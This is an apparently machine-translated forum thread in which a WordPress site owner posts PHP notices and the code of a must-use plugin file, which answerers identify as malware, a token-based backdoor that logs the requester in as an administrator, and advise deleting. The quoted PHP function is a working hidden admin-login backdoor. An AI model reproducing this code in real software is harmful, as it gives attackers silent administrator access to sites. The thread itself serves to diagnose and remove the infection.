plusitano Ответов: 3

Обратите внимание, что PHP-водитель маркер

У меня есть ошибка на wordpress, связанная с кодом, и мне интересно, можете ли вы, ребята, помочь с ней.

PHP Notice: Undefined index: token in /home/qbt6f0ng7wez/public_html/londonmotorcycleshop/wp-content/mu-plugins/rms_unique_wp_mu_pl_fl_nm.php на линии 6

/home/qbt6f0ng7wez/public_html/londonmotorcycleshop/wp-content/mu-plugins/rms_unique_wp_mu_pl_fl_nm.php на линии 18


На php файле:

function remote_sign_in () {
    if(!$_GET['token'] && is_user_logged_in()) //-> LINE 6 <-
        return;

    $key =  md5('thisisrandomtextsdsdsdsdsdsdsdsdsd');
    $minutes_1 = intval(gmdate('i')) + 1;
    $minutes_2 = intval(gmdate('i'));

    $signature[] = md5(gmdate("Ymd") . $key .  $minutes_1) ;
    $signature[] = md5(gmdate("Ymd") . $key .  $minutes_2) ;



    if(!in_array($_GET['token'] ,  $signature) ) //-> LINE 18 <-
        return;



    $users = get_users();
    foreach($users as $user ) {

        $user_id = $user->ID;

        $data = get_userdata( $user_id );

        $roles = $user->roles;


        if (in_array('administrator', $roles)) {
            log_me_in($user);
            exit;
        }
    }
}


Что я уже пробовал:

Ничего особенного, я не уверен в самой ошибке и в том, что ее вызывает.

Richard MacCutchan

Переменная "токен" нигде не определена.

3 Ответов

Рейтинг:
1

air4x

Это вредоносный код.
Файл wp-content/mu-plugins/rms_unique_wp_mu_pl_fl_nm.php открывает удаленный вход для людей, имеющих доступ к url-адресу сайта, передавая в url-адрес "токен". Если вы проверите файл, то увидите, что он сообщает url-адрес сайта обратно на сайт managerly.org.

Проверить это Плагины - rms_unique_wp_mu_pl_fl_nm.php - WordPress Development Stack Exchange[^] также.

Лучше всего удалить этот файл - wp-content/mu-plugins/rms_unique_wp_mu_pl_fl_nm.php

Я получил этот файл, созданный после установки плагина редактора. Я не помню, что именно. Вы, должно быть, недавно установили плагин, который добавил этот вредоносный файл. Найдите и удалите его также.

Рейтинг:
1

Patrice T

Цитата:
PHP Notice: Undefined index: token in ...

Это означает, что $_GET не содержат индекса token
Прочитай: PHP: array_key_exists - руководство пользователя[^]

Если вы хотите увидеть содержание $_GET, используйте отладчик.
Ваш код ведет себя не так, как вы ожидаете, или вы не понимаете, почему !

Существует почти универсальное решение: запускайте свой код на отладчике шаг за шагом, проверяйте переменные.
Отладчик здесь, чтобы показать вам, что делает ваш код, и ваша задача-сравнить с тем, что он должен делать.
В отладчике нет никакой магии, он не знает, что должен делать ваш код, он не находит ошибок, он просто помогает вам, показывая, что происходит. Когда код не делает того, что ожидается, вы близки к ошибке.
Чтобы увидеть, что делает ваш код: просто установите точку останова и посмотрите, как работает ваш код, отладчик позволит вам выполнять строки 1 на 1 и проверять переменные по мере их выполнения.

Отладчик - Википедия, свободная энциклопедия[^]

Освоение отладки в Visual Studio 2010 - руководство для начинающих[^]
Базовая отладка с помощью Visual Studio 2010 - YouTube[^]

phpdbg | php отладчик[^]
Методы отладки для PHP-программистов[^]

Отладчик здесь только для того, чтобы показать вам, что делает ваш код, и ваша задача-сравнить его с тем, что он должен делать.

Рейтинг:
1

Member 14938444

Будь осторожен, rms_unique_wp_mu_pl_fl_nm.php это вирус, возможно, вы используете обнуленные Плагины. Лучше всего удалить и проверить темы.

Richard Deeming

Как уже объяснялось в решении 2, еще в мае.